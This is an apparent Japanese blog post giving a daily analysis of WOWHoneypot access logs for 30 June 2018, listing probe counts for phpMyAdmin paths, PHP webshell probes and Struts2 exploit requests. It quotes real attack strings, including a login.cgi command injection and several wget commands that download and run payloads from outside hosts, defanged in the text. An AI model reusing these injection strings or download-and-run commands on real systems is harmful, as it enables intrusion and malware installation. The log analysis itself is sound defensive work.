WOWHoneypot簡易分析(27日目)
WOWhoneypotの2018/6/30(土)(運用27日目)の簡易分析です。
本日の総アクセス件数は182件です。
52 [2018-06-30 "GET /
20 [2018-06-30 "GET /index.action
7 [2018-06-30 "HEAD /
4 [2018-06-30 "GET /favicon.ico
3 [2018-06-30 "GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.62.190[.]191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$
2 [2018-06-30 "GET /xampp/phpmyadmin/index.php
2 [2018-06-30 "GET /www/phpMyAdmin/index.php
2 [2018-06-30 "GET /web/phpMyAdmin/index.php
2 [2018-06-30 "GET /typo3/phpmyadmin/index.php
2 [2018-06-30 "GET /tools/phpMyAdmin/index.php
2 [2018-06-30 "GET /pmd/index.php
2 [2018-06-30 "GET /pma-old/index.php
2 [2018-06-30 "GET /pmamy/index.php
2 [2018-06-30 "GET /pmamy2/index.php
2 [2018-06-30 "GET /PMA/index.php
2 [2018-06-30 "GET /pma/index.php
2 [2018-06-30 "GET /PMA2/index.php
2 [2018-06-30 "GET /phpMyAdmin/phpMyAdmin/index.php
2 [2018-06-30 "GET /phpmyadmin/phpmyadmin/index.php
2 [2018-06-30 "GET /phpMyAdminold/index.php
2 [2018-06-30 "GET /phpMyAdmin.old/index.php
2 [2018-06-30 "GET /phpmyadmin-old/index.php
2 [2018-06-30 "GET /phpMyAdmin/index.php
2 [2018-06-30 "GET /phpmyadmin/index.php
2 [2018-06-30 "GET /phpMyadmin_bak/index.php
2 [2018-06-30 "GET /phpmyadmin2/index.php
2 [2018-06-30 "GET /phpmyadmin1/index.php
2 [2018-06-30 "GET /phpmyadmin0/index.php
2 [2018-06-30 "GET /phpma/index.php
2 [2018-06-30 "GET /phpadmin/index.php
2 [2018-06-30 "GET /mysql/index.php
2 [2018-06-30 "GET /mysqladmin/index.php
2 [2018-06-30 "GET /mysql-admin/index.php
2 [2018-06-30 "GET /myadmin/index.php
2 [2018-06-30 "GET /myadmin2/index.php
2 [2018-06-30 "GET /index.php
2 [2018-06-30 "GET /db/index.php
2 [2018-06-30 "GET /dbadmin/index.php
2 [2018-06-30 "GET /claroline/phpMyAdmin/index.php
2 [2018-06-30 "GET /admin/PMA/index.php
2 [2018-06-30 "GET /admin/pma/index.php
2 [2018-06-30 "GET /admin/phpMyAdmin/index.php
2 [2018-06-30 "GET /admin/phpmyadmin/index.php
2 [2018-06-30 "GET /admin/phpmyadmin2/index.php
2 [2018-06-30 "GET /admin/mysql/index.php
2 [2018-06-30 "GET /admin/mysql2/index.php
2 [2018-06-30 "GET /admin/index.php
1 [2018-06-30 "PROPFIND /
1 [2018-06-30 "POST /xx.php
1 [2018-06-30 "POST /xw.php
1 [2018-06-30 "POST /wuwu11.php
1 [2018-06-30 "POST /w.php
1 [2018-06-30 "POST /wc.php
1 [2018-06-30 "POST /s.php
1 [2018-06-30 "POST /sheep.php
1 [2018-06-30 "POST /db_session.init.php
1 [2018-06-30 "POST /db.init.php
1 [2018-06-30 "GET /webdav/
1 [2018-06-30 "GET /manager/html
いつものように、index.phpと/のアクセスを除外します。
20 [2018-06-30 "GET /index.action
4 [2018-06-30 "GET /favicon.ico
3 [2018-06-30 "GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.62.190[.]191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$
1 [2018-06-30 "POST /xx.php
1 [2018-06-30 "POST /xw.php
1 [2018-06-30 "POST /wuwu11.php
1 [2018-06-30 "POST /w.php
1 [2018-06-30 "POST /s.php
1 [2018-06-30 "POST /sheep.php
1 [2018-06-30 "POST /db_session.init.php
1 [2018-06-30 "POST /db.init.php
1 [2018-06-30 "POST /wc.php
1 [2018-06-30 "GET /webdav/
1 [2018-06-30 "GET /manager/html
本日初見のアクセスパスは以下です。
POST /wc.php HTTP/1.1
User-Agent: Mozilla/5.0
1=die('Hello, Peppa!'.(string)(111111111*9));
他の8件の.phpへのアクセスと同じくphpの脆弱性を突くものと思われますが、wc.phpへのアクセスログを拾ったのは本日が初めてです。
また、本日は以下へのアクセスが多かったです。これはApache Struts2の脆弱性を突くものです。アクセス元は3IPでした。
20 [2018-06-30 "GET /index.action
本日のハンティングログです。Mirai亜種以外は全てStrutsの脆弱性を突いたもので検知していました。
3 [2018-06-30 wget hxxp://185.62.190[.]191/r
1 [2018-06-30 wget -P /tmp hxxp://hfs.mhacker[.]cc:9278/Linux.server
1 [2018-06-30 wget -c hxxp://aaa.linuxa[.]club:57843/linux
1 [2018-06-30 wget -c hxxp://23.249.162[.]123:9998/servic
以上です。